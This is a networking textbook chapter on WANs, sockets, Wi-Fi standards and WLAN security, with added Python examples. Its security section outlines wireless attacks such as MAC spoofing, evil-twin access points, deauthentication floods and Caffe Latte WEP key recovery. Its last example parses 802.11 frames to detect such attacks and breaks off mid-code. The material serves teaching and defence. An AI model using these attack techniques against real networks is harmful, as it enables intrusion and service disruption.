A corporation with many sites around the globe can use a WAN to form an intranet. Each of the individual site offices uses its own LANs for services like internal messaging, data processing functions, and hardware and software sharing. These LANs are joined together to form a WAN that offers the same data sharing and messaging capabilities across a much broader geographic area.

Other business partners like suppliers or distributors may create a WAN as a means of establishing an extranet. The extranet provides access to information like the availability of a product and its delivery time, and other associated information. Some WANs bring together various types of communications, such as data, video, and voice. Some organizations, including companies, universities, research centers, hospitals, and libraries, use WANs to connect to the Internet [2,5,8,10].

The world's most popular WAN is the Internet. Some segments of the Internet, like virtual private network (VPN)-based extranets, are also WANs in themselves. WANs generally utilize different and much more expensive networking equipment than do LANs. Key technologies often found in WANs include Synchronous Optical Network (SONET), Frame Relay, and ATM.

WAN-Based Technologies 

The WAN has gone through a number of technological changes since its inception, and as such a number of connection mechanisms have been proposed in the literature.

Following is a partial list of some of those advances and associated standards. Synchronous Optical Network/Synchronous Digital Hierarchy (SONET/SDH), multi protocol label switching (MPLS), ATM, and Frame Relay are often used by service providers to deliver the links that are used in WANs. X.25 was an important early WAN protocol, and is often considered to be the core of Frame Relay, as many of the underlying protocols and functions of X.25 are still in use today by Frame Relay. Some of the materials presented here have been derived from Refs. [2,6,9,11].

Reference [6] refers to an international company that provides a single source of web and mail security, archiving, backup and fax, networking and security software, and hosted IT solutions for small to medium-sized enterprises (SMEs).

1. Telephone connections: six types of connections are offered:
   a. Dial up
   b. Leased lines
   c. T carrier lines
   d. T1 and T3 lines
   e. Integrated Services Digital Network (ISDN)
   f. Switched-56

2. Multi protocol label switching: It uses Layer 2 information such as links, bandwidth, latency, and utilization for determining the routes, either by IP within a particular autonomous system or by an ISP for exchanging IP packets over the Internet.

3. X.25: It specifies how to connect computer devices to public switched data networks.

4. Frame relay: It uses frames of varying length and operates at the data link layer of the OSI model. A permanent virtual circuit (PVC) is established between two hosts on the network.

5. Switched multi-megabit data service: It allows fixed length cell switching and offers data rates between 1.533 and 45 Mbps.

6. Asynchronous transfer mode: It supports transmission of audio, video, and data and uses a variety of media with both baseband and broadband systems.

7. Synchronous optical network: It defines a physical layer standard over fiber optics for carrying voice, data, and video.

Table 29.2 gives a comparison of all the technologies as dis- 
cussed above for WANs. 


TABLE 29.2 Comparison of Technologies for WAN

  Technology     Speed                    Characteristics
  Switched-56    56 Kbps                  Switched line, not dedicated
  X.25           64 Kbps                  Packet switching, error correction, store and forward, with round trip delay
  Frame Relay    56 Kbps to 1.544 Mbps    Varying length frames with PVC
  SMDS           1.533-45 Mbps            Fixed cell length with no error checking
  T1             1.544 Mbps               24 multiplexed channels
  T3             44.736 Mbps              672 multiplexed channels
  SONET          51.8 Mbps (OC-1)         OC-2 is 2X OC-1, OC-3 is 3X OC-1
  ATM            155-622 Mbps             Fixed length packets; works on SONET and T carrier lines; uses VCs




Transmission rates usually range from 1200 bps to 6 Mbps, although some connections such as ATM and leased lines can reach speeds greater than 156 Mbps. Typical communication links used in WANs are telephone lines, microwave links, and satellite channels.

INTERNET PROTOCOL NETWORKS

The Internet, using the IP, has become by far the most ubiquitous WAN in the world. Internet users are able to transmit everything from video clips, e-mail, and telephone calls (called Voice over IP) to digitized x-rays over the Internet. Computer networks include individual segments of network cable. The electrical properties of cabling limit the useful size of any given segment, such that even a modestly sized local-area network will require several of them. Gateway devices like routers and bridges connect these segments together, although not in a perfectly seamless way.

Variations of IP Networks 

There are three basic variations of IP networks. The first is the overall Internet itself, which encompasses all personal and business users of the Internet. The second type of IP-based network is the intranet. An intranet is usually deployed within a specific organization or company. A company intranet may be used to manage human resources and financial processes and keep employees updated on company news. The third type of IP-based network is the extranet. Typically, extranets are used to link multiple organizations or companies for some common business purpose. In both intranets and extranets, a technology known as a firewall is employed to prevent unauthorized access to the network or unauthorized Uniform Resource Locator (URL) requests from the network. The URL is the basic unique address or location for any website or other Internet service.

The following configuration (Figure 29.10) shows all the 
elements of WAN. In this model, LANs are connected to a 
router thus connecting the hosts to the router. In some cases 
a host can be connected directly to a router. The collection 
of communication lines and routers (but not the hosts) form 
the subnet. 

FIG. 29.10 Elements of WAN (hosts on a LAN connected through routers and communication lines).

Wide-area networks also operate over a variety of wireless media. Wireless media can support either fixed or mobile applications. Another common distinction in wireless networks is whether a link is point-to-point or point-to-multipoint. In point-to-point the originating transmission has one receiver, whereas in point-to-multipoint the originating transmission has multiple receivers. Examples of wireless media include radio wave, microwave, cellular, and satellite.

PERSONAL AREA NETWORK 

The concept of a PAN was first developed by Thomas Zimmerman and other researchers at MIT's Media Lab and later supported by IBM's Almaden Research Lab. It is defined as a computer network that is used for communication among computer devices such as mobile computers, cell phones, and handheld computing devices such as PDAs, laptops, PCs, printers, and video game consoles, and also for connecting to other networks including the Internet. One device is selected to assume the role of the controller during wireless PAN initialization, and this controller device mediates communication within the WPAN. The controller broadcasts a beacon that lets all devices synchronize with each other and allocates time slots for the devices. Some of the materials have been derived from Refs. [8,9].

The 802.15 working group is defining different versions for devices that have different requirements. IEEE 802.15.3 focuses on high bandwidth of about 55 Mbit/s with low-power MAC and physical layers, while 802.15.4 deals with low bandwidth of about 250 Kbit/s with extra-low power MAC and physical layers. 802.15 aims to secure wireless PANs.

CLIENT-SERVER MODEL AND SOCKET PROGRAMMING 

As mentioned above in the OSI model, the services of a layer are available to higher layers through the SAP, which is also known as a port or socket. Further, all the protocols and applications are built around the client-server model. Due to a tremendous push for world-wide competition in recent years, financial and economic sectors are gearing toward globalization to balance traditional centralized corporate control. This trend has forced the business community to adopt new techniques for increasing productivity at lower operating costs. A new concept of re-engineering has emerged that encourages corporate-wide work-flow processes to be redesigned instead of simply automating the existing processes within organizations. Emerging technologies are being used to fulfill the performance and productivity targets of corporate re-engineering.

Large corporations usually make decisions about future expansion or strategy based on data stored in central databases or files residing on mainframes or minicomputers. The offloading of processing and manipulation of data from these expensive minicomputers and mainframes should be done over cheaper workstations while still offering access to the host machine. This can easily be implemented using the client-server computing paradigm, framework, or model.

A client is an application program that runs using local computing resources and, at the same time, can request a database or other network service from another remote application residing on a server, which has another program running on it. The software offering interaction between clients and servers is usually termed middleware. The client resides on a PC, laptop, or any other computing device and is connected via a network to more powerful PCs, workstations, or even mainframe or minicomputers, usually known as servers. These are capable of handling requests from more than one client simultaneously. The model supports a number of client-server models and operating systems, various Graphical User Interface (GUI) tools, standard GUI tools, toolkits for customizing user interfaces, and many others. The client and server communicate with each other through SAPs, ports, or sockets. The following section describes in brief the concept of a socket and socket programming based on the client-server paradigm.

Socket 

A socket can be defined as a network SAP or port that represents an endpoint of a bidirectional inter-process communication flow across an IP-based computer network. It accepts and forwards incoming data packets to the appropriate application process or thread, based on a combination of local and remote IP addresses and port numbers. A socket address is the combination of an IP address (the location of the computer) and a port (which is mapped to the application program process) into a single identity. Sockets or ports are used in protocols such as a transport protocol (e.g., TCP, UDP), raw IP, or others and define a unique address for each of the protocols being used; for example, TCP port 53 and UDP port 53 are different, distinct sockets. The local socket address includes the IP address and port number. The remote socket address is also part of the identity of an established TCP socket on a TCP server, since the server may serve several clients concurrently: the server creates one socket for each client, and these sockets share the same local socket address. Some of the materials presented here have been derived from Refs. [7,10,11].

Socket types: Based on the application, the following standard Internet sockets are available:

• Datagram sockets, also known as connectionless sockets, which use UDP. Each packet sent or received on a datagram socket is individually addressed and routed. Multiple packets sent from one node to another may arrive in any order and might not arrive at the receiving computer at the same time.

• Stream sockets, also known as connection-oriented sockets, which use TCP or Stream Control Transmission Protocol (SCTP). They provide sequencing of the packets, error control, flow control, and well-defined mechanisms for creating and destroying connections.

• Raw sockets (or raw IP sockets), typically available in routers and other network equipment. They allow direct sending and receiving of network packets by applications, bypassing all encapsulation in the networking software of the operating system.

In addition to the standard IP sockets there are some non-Internet sockets, implemented over other transport protocols, such as SNA and Unix Domain Sockets (UDS), for internal inter-process communication.

Socket Implementation Issues 

Sockets are usually implemented as an Application Program Interface (API) library such as Berkeley sockets, which were introduced in 1983. Implementations based on Berkeley sockets include Winsock, introduced in 1991, the STREAMS-based Transport Layer Interface (TLI), and others. Development of client-server application programs for the network or Internet that utilize this API is called socket programming or network programming.

The API library offers the following functions or methods that can be used for socket implementation:

• socket() creates a new socket of a certain socket type, identified by an integer number, and allocates system resources to it.

• bind() is typically used on the server side and associates a socket with a socket address structure, i.e., a specified local port number and IP address.

• listen() is used on the server side and causes a bound TCP socket to enter the listening state.

• connect() is used on the client side and assigns a free local port number to a socket. In the case of a TCP socket, it causes an attempt to establish a new TCP connection.

• accept() is used on the server side. It accepts a received incoming attempt to create a new TCP connection from the remote client and creates a new socket associated with the socket address pair of this connection.

• send() and recv(), or write() and read(), or sendto() and recvfrom(), are used for sending and receiving data to/from a remote socket.

• close() causes the system to release the resources allocated to a socket. In the case of TCP, the connection is terminated.

• gethostbyname() and gethostbyaddr() are used to resolve host names and addresses.

• select() is used to prune a provided list of sockets for those that are ready to read, ready to write, or have errors.

• poll() is used to check on the state of a socket. The socket can be tested to see if it can be written to, read from, or has errors.




Client-Server Implementation Using Socket 

The following is the sequence of steps needed to create a socket for any application (e.g., e-mail, ftp, remote access, etc.).

• An application process providing a service on a server creates a socket on start up and configures it in the listening state.

• The socket waits for initiatives from client program processes. For a listening TCP socket, the remote address presented by netstat may be denoted 0.0.0.0 and the remote port number 0.

• A TCP server may serve several clients concurrently, by creating a child process for each client and establishing a TCP connection between the child process and the client.

• Unique dedicated sockets are created for each connection. These are in the established state when a socket-to-socket virtual connection or virtual circuit (VC), also known as a TCP session, is established with the remote socket, providing a duplex byte stream.

• Other possible TCP socket states presented by the netstat command are Syn-sent, Syn-recv, Fin-wait1, Fin-wait2, Time-wait, Close-wait, and Closed, which relate to various start up and shutdown steps.

• A server may create several concurrently established TCP sockets with the same local port number and local IP address, each mapped to its own server-child process, serving its own client process. They are treated as different sockets by the operating system, since the remote socket addresses (the client IP address and/or port number) are different, that is, since they have different socket pair tuples.

• A UDP socket cannot be in an established state, since UDP is connectionless. Therefore, netstat does not show the state of a UDP socket.

• A UDP server does not create new child processes for every concurrently served client; instead the same process handles incoming data packets from all remote clients sequentially through the same socket. This implies that UDP sockets are not identified by the remote address, but only by the local address, although each message has an associated remote address.

• Interconnecting devices like routers and switches typically do not use the socket identifiers of the routed or switched data. However, stateful network firewalls and Network Address Translation proxy servers automatically keep track of all active socket pairs, UDP as well as TCP, based on certain time-out settings.

• Raw sockets are typically available in the network environment and used for routing protocols such as IGMP and OSPF, and in ICMP.

A typical server-client model offers the following processes to be implemented for inter-process communication (Figure 29.11).
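As an added example (Python, not the chapter's own code) for the socket-address discussion above and for the connection sequence just listed, three functions, tcp_socket_pairs, same_port_tcp_and_udp, and udp_one_socket_many_clients (names are the example's own), make the operating system show what the text states: accepted TCP sockets on one server share the same local address and differ only in the remote half of their socket pair; a TCP socket and a UDP socket on the same port number are distinct sockets; and a UDP server reaches all of its clients through the one socket it bound, with the remote address arriving per datagram. Everything stays on 127.0.0.1, and the port numbers are whatever the OS assigns.

```python
import socket

# Constructed for this example: all traffic stays on the loopback interface.
LOOPBACK = "127.0.0.1"
TIMEOUT = 5.0


def tcp_socket_pairs(client_count=2):
    """Accept several concurrent TCP clients and return the (local, remote)
    address pair of each accepted socket. The local halves are identical; the
    remote halves differ, which is how the OS, and a stateful firewall tracking
    socket pairs, tells the connections apart."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((LOOPBACK, 0))          # well-known address would go here in a real server
    listener.listen(client_count)         # connection request queue size (Figure 29.11)
    port = listener.getsockname()[1]
    # On loopback the handshake completes in the kernel, so the clients can connect
    # before the server calls accept(); the backlog holds them meanwhile.
    clients = [socket.create_connection((LOOPBACK, port), timeout=TIMEOUT)
               for _ in range(client_count)]
    accepted = [listener.accept()[0] for _ in range(client_count)]
    pairs = [(conn.getsockname(), conn.getpeername()) for conn in accepted]
    for sock in accepted + clients + [listener]:
        sock.close()
    return pairs


def same_port_tcp_and_udp(attempts=5):
    """Bind a TCP socket and a UDP socket to the same port number. Both bind()
    calls succeed because the socket identity includes the protocol, not just
    the address and port. Returns (port, True)."""
    for _ in range(attempts):
        tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp.bind((LOOPBACK, 0))
        port = tcp.getsockname()[1]
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            udp.bind((LOOPBACK, port))
            return port, udp.getsockname()[1] == port
        except OSError:
            continue  # that UDP port happened to be in use elsewhere; try another
        finally:
            udp.close()
            tcp.close()
    raise RuntimeError("no free port shared by TCP and UDP after several attempts")


def udp_one_socket_many_clients(client_count=3):
    """A UDP server handles every client through the single socket it bound:
    the remote address comes back from recvfrom() with each datagram and is
    handed to sendto() for the reply. Returns (distinct remote addresses seen,
    sorted acknowledgements received by the clients)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind((LOOPBACK, 0))
    server.settimeout(TIMEOUT)            # never wait forever on a datagram that may not come
    server_addr = server.getsockname()
    clients = []
    for i in range(client_count):
        client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        client.settimeout(TIMEOUT)
        client.sendto(b"client-%d" % i, server_addr)  # implicit bind to an ephemeral port
        clients.append(client)
    remotes = set()
    for _ in range(client_count):
        data, remote = server.recvfrom(4096)          # remote address travels with the datagram
        remotes.add(remote)
        server.sendto(b"ack " + data, remote)         # reply to whoever sent this one
    acks = sorted(client.recvfrom(4096)[0] for client in clients)
    for sock in clients + [server]:
        sock.close()
    return len(remotes), acks


if __name__ == "__main__":
    print(tcp_socket_pairs())
    print(same_port_tcp_and_udp())
    print(udp_one_socket_many_clients())
```

The socket pairs returned by tcp_socket_pairs are exactly the tuples a stateful firewall or NAT device records per connection, so the same output explains why such devices need a per-flow table with a time-out rather than a single entry per server port.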


WIRELESS NETWORKS AND SECURITY ISSUES 

The first generation of wireless data modems was developed in the early 1980s by amateur radio operators and named packet radio. They added a voice band data communication modem, with data rates below 9600 bit/s, to an existing short distance radio system, typically in the 2 m amateur band. The second generation of wireless modems was developed immediately after the FCC announcement of experimental bands for non-military use of spread spectrum technology. These modems provided data rates on the order of hundreds of kbit/s. The third generation of wireless modems then aimed at compatibility with existing LANs, with data rates on the order of Mbit/s. Several companies developed third generation products with data rates above 1 Mbit/s, and a couple of products had already been announced by the time of the first IEEE Workshop on Wireless LANs in 1991.

A Wireless LAN (WLAN) is a LAN that connects computers or devices wirelessly using Orthogonal Frequency Division Multiplexing (OFDM) technology. In this method, multiple signals are transmitted simultaneously over a single transmission path, such as a cable or wireless system. Each signal travels within its own unique frequency range (carrier), which is modulated by the data (text, voice, video, etc.). Some of the materials presented here have been derived from Refs. [9,10].

While wireless LAN products were appearing in the market, the IEEE 802.11 committee started its activities of developing standards for wireless LANs. This technology was well received, with a number of applications being developed, and by 1996 many chip sets for wireless LAN implementation had been introduced in the market. Wireless LAN technology found its applications in hospitals, stock exchanges, and many other campus buildings for nomadic access, point-to-point LAN bridges, ad hoc networks, and also for internetworking. During the same time the wireless LAN interoperability forum within IEEE 802.11 and the European HiperLAN specification worked toward wireless LAN standards, and the Unlicensed Personal Communications Services proposed a new standard as SUPERNet, which was later named the U-NII bands.

Components of Wireless Networks 

Wireless host: It is the end-system device that runs applications. It may be a laptop, palmtop, PDA, cell phone, desktop computer, or other computing device. The hosts need not be mobile.

Wireless link: Hosts communicate with each other through a wireless communication link. Different types of wireless link technologies with different rates have been introduced.

Base station: The station that is responsible for sending and receiving data packets to and from the wireless hosts that are associated with it. The association of a host with a base station means that the host is within the wireless communication distance of the base station; examples are cell towers in cellular networks and access points in 802.11 wireless networks. The hosts or cells are allocated a band of frequencies and are attached to a base station. The base station consists of a transmitter, a receiver, and a control circuit unit. Interference and cross talk do not exist, as each adjacent cell or host is assigned different frequencies. In some situations where the cells and hosts are located significant distances apart, the same frequency may be reused.

FIG. 29.11 Inter-process communications in the client-server model. Server: open communication end point; register well-known address with the system; establish the client connection request queue size; accept the first client connection request on the queue; send/receive data; shut down. Client: open communication end point; set up connection to server; send/receive data; shut down.

Advantages and Disadvantages of WLANs 

Wireless LANs have been adopted due to their convenience, cost efficiency, and ease of integration with other networks and network components. The majority of computer manufacturers include the necessary wireless LAN technology in their products. The following is a brief discussion of some of the advantages and disadvantages of WLANs. Some of the materials presented here have been derived from Refs. [2,4,6].

Advantages

1. Convenience
2. Mobility
3. Deployment
4. Expandability
5. Low cost




Disadvantages 

1. Security
2. Limited range
3. Poor reliability
4. Speed
5. Radio emissions

Configurations in Wireless LANs 

WLANs can be configured in a variety of ways, which is 
based on applications, available hardware devices and proto- 
cols, and so on. Peer-to-peer and client-server configurations 
are popular in WLAs. 

Peer-to-peer (P2P) network or ad hoc network: provides 
communication between two wireless devices connected 
such that both nodes can start communication based on 
Independent Basic Service Set (IBSS). All the nodes can 
make a request and provide the services. Wireless devices 
within range of each other can discover and communicate 
directly without involving central access points. This method 
is typically used by two computers so that they can connect 
to each other to form a network. IEEE 802.11 specification 
documents define the physical layer (PHY) and MAC lay- 
ers, and it includes three standards for PHY: diffuse infrared 
operating at 1 Mbit/s in; frequency-hopping spread spectrum 
operating at 1 or 2 Mbit/s; and direct-sequence spread spec- 
trum operating at 1 or 2 Mbit/s. 

Client-server: this framework has been widely used in implementing Internet applications, and it also finds application in wireless LANs. In this configuration, a client makes a request to a server and the server provides the service to the client. The client-server model offers advantages such as centralized management, stronger security, easier expansion, and the ability to build redundant systems. Client-server networks use user-level security: an administrator grants rights before anyone can access a PC. The model also suffers from certain disadvantages: it is expensive, it is difficult to implement, and the server is a central point of failure. It offers a number of services via different servers, such as:

File server: The file server offers services that allow users to share files, and includes storing, retrieving, and moving data.

Print server: The print server controls the queue or spooler, which holds jobs until the printer is ready.

Application server: The application server allows a client to access and use extra computing power and extensive software applications that reside on a shared computer; an SQL back end does all the processing.

Other servers: The other servers are database, proxy, mail, FTP, DNS, DHCP, RAS, web, directory, and newsgroup servers.


WLAN Standardization 

To support communication over a wireless medium, the wireless interface of a client or access point contains a radio and an antenna. To avoid interference and allow several networks to operate in the same location, IEEE 802.11 specifies groups of frequencies that may be used by a network. Two groups are in the radio frequency band and one in the infrared band of the electromagnetic spectrum. The radio frequencies available to Wi-Fi are in the 2.4 GHz Industrial, Scientific, and Medical (ISM) band and the 5 GHz Unlicensed National Information Infrastructure (U-NII) band. Depending on the regulatory authority, the range used by IEEE 802.11b and 802.11g is 2.402-2.495 GHz, and the ranges used by IEEE 802.11a are 5.15-5.25, 5.25-5.35, and 5.725-5.875 GHz. Some of the material presented here has been derived from Refs. [3,4,13-15].

Reference [13] refers to the Financial Services Information Sharing and Analysis Center (FS-ISAC), which was established in 1999 by the financial services sector in response to 1998's Presidential Decision Directive 63. That directive, later updated by 2003's Homeland Security Presidential Directive 7, mandated that the public and private sectors share information about physical and cyber security threats and vulnerabilities to help protect the U.S. critical infrastructure.

Reference [14] refers to the National Communications System (NCS), which began in 1962 after the Cuban missile crisis, when communication problems among the United States, the Union of Soviet Socialist Republics, the North Atlantic Treaty Organization, and foreign heads of state threatened to complicate the crisis further.

Reference [15] refers to the establishment of the Electricity Sector Information Sharing and Analysis Center (ES-ISAC), which serves the electricity sector by facilitating communication between electricity sector participants, federal governments, and other critical infrastructures.

The IEEE 802.11 standard divides the 2.4 GHz band into 14 channels, but because each DSSS channel is 22 MHz wide and the channel centers are only 5 MHz apart, only 3 of them (1, 6, and 11) are non-overlapping. The 5 GHz band, on the other hand, is divided into 12 non-overlapping channels. A Wi-Fi network may operate on any of these channels, but a single wireless interface operates on only one channel at a time. The data rate of a channel can be adjusted dynamically depending on the quality of the channel. The initial version of 802.11 supported data rates of 1 and 2 Mbps; later versions support 11 Mbps (IEEE 802.11b) and up to 54 Mbps (IEEE 802.11a and 802.11g). Some Wi-Fi equipment supports data rates up to 108 Mbps by using two channels at the same time (the proprietary Super G and Turbo G modes).
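The channel counts quoted above follow directly from the channel center frequencies and widths. The following Python is an added illustration, not code from the chapter: it computes 802.11 channel centers (2407 + 5n MHz in the 2.4 GHz band, with channel 14 at 2484 MHz, and 5000 + 5n MHz in the 5 GHz band) and greedily selects a maximal set of mutually non-overlapping channels. The channel lists are constructed for the example (the FCC plan of channels 1-11 with 22 MHz DSSS channels, and the twelve original 802.11a U-NII channels with 20 MHz spacing); regulatory tables for other regions differ.

```python
"""Why 2.4 GHz yields only three non-overlapping Wi-Fi channels while the
original 5 GHz plan yields twelve: compute channel centers and greedily pick
a maximal set of mutually non-overlapping channels."""


def center_mhz(channel):
    """Center frequency in MHz. 2.4 GHz band: 2407 + 5*n for channels 1-13,
    channel 14 is the special case 2484 MHz; 5 GHz band: 5000 + 5*n."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    return 5000 + 5 * channel


def overlaps(ch_a, ch_b, width_mhz):
    # Two equal-width channels overlap when their centers are closer than one channel width
    return abs(center_mhz(ch_a) - center_mhz(ch_b)) < width_mhz


def non_overlapping(channels, width_mhz):
    """Greedy selection in frequency order: keep a channel only if it does not
    overlap the last channel kept. For equal-width channels on a line this
    earliest-first choice yields a maximum-size non-overlapping set."""
    chosen = []
    for ch in sorted(channels, key=center_mhz):
        if not chosen or not overlaps(chosen[-1], ch, width_mhz):
            chosen.append(ch)
    return chosen


# Constructed channel lists (FCC 2.4 GHz plan; original 802.11a U-NII channels)
BAND_2G4 = list(range(1, 12))
BAND_5G = [36, 40, 44, 48, 52, 56, 60, 64, 149, 153, 157, 161]

if __name__ == "__main__":
    print("2.4 GHz, 22 MHz channels:", non_overlapping(BAND_2G4, 22))  # [1, 6, 11]
    print("5 GHz, 20 MHz channels:  ", non_overlapping(BAND_5G, 20))   # all twelve
```

Channels 1 and 5 have centers 20 MHz apart and so overlap; 1 and 6 are 25 MHz apart and do not, which is why the usual non-overlapping plan is 1, 6, 11. With 20 MHz channels on a 20 MHz grid every 5 GHz channel is independent.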

Standard Protocol for Wireless LANs 

IEEE 802.11 defines a single MAC, which is based on Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). The specification also includes methods designed to minimize collisions. There may be a situation where two mobile nodes are both in range of an access point but not in range of each other (the hidden node problem). In order to handle these situations, the



TABLE 29.3
IEEE 802.11 Standard Protocols for WLAN

Protocol   Release Date   Operating Frequency (GHz)          Data Rate (Typical) (Mbit/s)   Data Rate (Max) (Mbit/s)   Range (Indoor)
Legacy     1997           2.4-2.5                            1                              2                          ~20 m
802.11a    1999           5.15-5.35/5.47-5.725/5.725-5.875   25                             54                         ~30 m (~100 ft)
802.11b    1999           2.4-2.5                            6.5                            11                         ~50 m (~150 ft)
802.11g    2003           2.4-2.5                            11                             54                         ~30 m (~100 ft)
802.11n    2006 (draft)   2.4 or 5                           200                            540                        ~50 m (~160 ft)


802.11 specifications define two modes of operation: (1) ad hoc mode, which enables peer-to-peer communication between mobile nodes, and (2) infrastructure mode, which enables the mobile nodes to communicate through an access point that serves as a bridge to a wired network infrastructure; this is by far the more common wireless LAN application. A bridge connects different types of networks, and a wireless Ethernet bridge connects the devices of a wired Ethernet network to a wireless network. Some of the material presented here has been derived from Refs. [4,6,13-15].

Table 29.3 summarizes the main IEEE 802.11 standard protocols for wireless LANs.

Wireless Technology Types 

Worldwide Interoperability for Microwave Access (WiMAX): It is a telecommunication technology that provides wireless data communication via different transmission modes, such as point-to-multipoint, portable, and fully mobile Internet access. It supports up to 10 Mbps broadband speed without the need for cables. It is based on the IEEE 802.16 standard (also known as Broadband Wireless Access). The WiMAX Forum was created in June 2001 to promote conformity and interoperability of the standard. The forum describes WiMAX as "a standards-based technology enabling the delivery of wireless broadband access as an alternative to cable and DSL."

Universal Mobile Telecommunication System (UMTS): It is a 3G wireless system that delivers high-bandwidth data and voice services to mobile users. It evolved from the Global System for Mobile Communications (GSM).

General Packet Radio Service (GPRS): The GPRS core net- 
work is the centralized part of the GPRS system. It offers 
mobility management, session management, and transport 
for IP packets in GSM and WCDMA networks. 

Global System for Mobile Communications (GSM): It works over circuit-switched networks. A mobile computer with a special modem can use a GSM telephone to place a data call in the same way as over a hardwired telephone line.

Cellular Digital Packet Data (CDPD): CDPD follows the OSI model closely. The physical layer deals with the details of modulation and radio transmission. Data link, network, and transport protocols are also present. A CDPD system includes three kinds of stations: mobile hosts, base stations, and base interface stations. These stations communicate with stationary hosts and standard routers of the kind found in any WAN.

Local Multipoint Distribution Service (LMDS): It is a fixed broadband line-of-sight, point-to-multipoint microwave system, which operates at high frequency (typically within specified bands in the 24-40 GHz range) and can deliver very high capacity, depending on the associated technologies.

IEEE 802.11: IEEE 802.11, the Wi-Fi standard, denotes a set of wireless LAN (WLAN) standards developed by Working Group 11 of the IEEE LAN/MAN Standards Committee (IEEE 802). The 802.11 family currently includes six over-the-air modulation techniques that all use the same MAC protocol. The most popular (and prolific) techniques are those defined by the b, a, and g amendments to the original standard.

SECURITY ISSUES IN WLANs 
Unauthorized Access and Attacks 

The following section describes the types of unauthorized access and attack that are common on wireless LANs; several of them apply to wired LANs as well.

1. Accidental association: When a user turns on and boots up a laptop, it may associate with a wireless access point of a neighboring company's overlapping network without the knowledge of the user.

2. Malicious association: Attackers can make wireless devices connect to a laptop they control, configured to act as an access point, instead of to the company's access point. Because the association happens at Layer 2, protection mechanisms at Layer 3 such as network authentication and VPNs do not prevent it. In most cases the attacker is trying to take over the client at Layer 2 rather than to crack the network's security and authentication measures.

3. Ad hoc networks: Usually have little protection, although encryption methods can be used to secure them. An ad hoc network introduces a security problem through the bridge it can provide to other networks, usually in the corporate environment. In most versions of Microsoft Windows this feature is turned on unless explicitly disabled, so the user may not even know that an unsecured ad hoc network is operating on their computer. If they are also using a wired or wireless infrastructure network at the same time, they are providing a bridge into the secured organizational network through the unsecured ad hoc connection.

4. Nontraditional networks: Nontraditional networks such as personal area networks based on Bluetooth devices are not safe from cracking and should be regarded as a security risk. Even barcode readers, handheld PDAs, and wireless printers and copiers should be secured.

5. Identity theft (MAC spoofing): It occurs when an attacker listens to the network traffic and identifies the MAC address of a computer with network privileges, then configures his own adapter with that address. Most wireless systems allow some kind of filtering so that only authorized computers with specific MAC addresses can join and use the network, but a number of programs with network "sniffing" capabilities exist. MAC filtering is effective only for small residential networks, since it provides protection only while the authorized device is not connected or is inactive: any connected or active 802.11 device transmits its MAC address unencrypted in its 802.11 headers, regardless of WEP or WPA encryption of the payload, and no special equipment or software is needed to read it. Anyone with an 802.11 receiver (a laptop with a wireless adapter) and a freeware wireless packet analyzer can obtain the MAC address of any transmitting 802.11 device within range.

6. Man-in-the-middle attacks: An attacker entices computers to log into a computer that is set up as a soft AP (access point). Once this is done, the attacker connects to a real access point through another wireless card, offering a steady flow of traffic through the transparent attacking computer to the real network. The attacker can then sniff, and modify, the traffic.

7. Denial of service (DoS): occurs when an attacker continually bombards a targeted AP or network with bogus requests, premature successful-connection messages, failure messages, and/or other commands. In 802.11 networks without management frame protection, forged deauthentication and disassociation frames are accepted without any cryptographic check, so a single attacker can repeatedly knock every client off an AP.

8. Network injection: In a network injection attack, an attacker makes use of access points that are exposed to unfiltered network traffic, specifically broadcast traffic. The attacker injects bogus network reconfiguration commands that affect routers, switches, and intelligent hubs. A whole network can be brought down in this manner and require rebooting or even reprogramming of all intelligent networking devices.

9. Caffe Latte attack: The Caffe Latte attack is another way to defeat WEP. It does not require the attacker to be within range of the target access point: the attacker targets an isolated client that still holds the WEP key of a network it has used before and, by sending it crafted ARP requests, collects enough encrypted responses to recover the key within minutes.
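Items 5 to 7 above share one root cause: the 802.11 MAC header and management frames are sent in the clear, whatever encryption protects the data payload. The following Python is an added example, not code from the original chapter, showing how little it takes to exploit or detect this. It builds a small constructed "capture" of 802.11 frames (the addresses, the SSID "CorpNet", and the flood threshold are assumed), parses the 24-byte MAC header, and checks three things: a cloned client MAC passes a MAC allowlist even on protected data frames (item 5), a beacon advertising the corporate SSID from an unknown BSSID is flagged as a soft-AP evil twin (item 6), and a burst of deauthentication frames sent under the AP's address is flagged as a DoS (item 7).

```python
"""Parse raw IEEE 802.11 MAC headers and run three checks over a constructed
capture: MAC-filter bypass, rogue-AP beacons, and deauthentication floods."""
import struct
from collections import Counter

MGMT, DATA = 0, 2          # frame types
BEACON, DEAUTH = 8, 12     # management subtypes


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_frame(ftype, subtype, addr1, addr2, addr3, body=b"", protected=False):
    # Frame Control byte 0: subtype (4 bits) | type (2 bits) | protocol version (2 bits, 0)
    # Frame Control byte 1: flags; bit 6 is the Protected Frame bit (WEP/TKIP/CCMP payload)
    fc = bytes([(subtype << 4) | (ftype << 2), 0x40 if protected else 0x00])
    duration, seq_ctrl = b"\x00\x00", b"\x00\x00"
    return fc + duration + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3) + seq_ctrl + body


def parse_frame(raw):
    """Decode the 24-byte MAC header. The addresses are plaintext even when the
    payload is encrypted; for management frames addr2 = SA and addr3 = BSSID."""
    if len(raw) < 24:
        raise ValueError("truncated 802.11 header")
    return {
        "type": (raw[0] >> 2) & 0x3,
        "subtype": (raw[0] >> 4) & 0xF,
        "protected": bool(raw[1] & 0x40),
        "addr1": mac_str(raw[4:10]),
        "addr2": mac_str(raw[10:16]),
        "addr3": mac_str(raw[16:22]),
        "body": raw[24:],
    }


def beacon_body(ssid):
    # Fixed fields: timestamp (8), beacon interval (2), capability (2); then the SSID element (tag 0)
    return b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) + bytes([0, len(ssid)]) + ssid.encode()


def beacon_ssid(body):
    pos = 12                                   # skip the fixed fields, walk the (tag, len, value) elements
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        if tag == 0:
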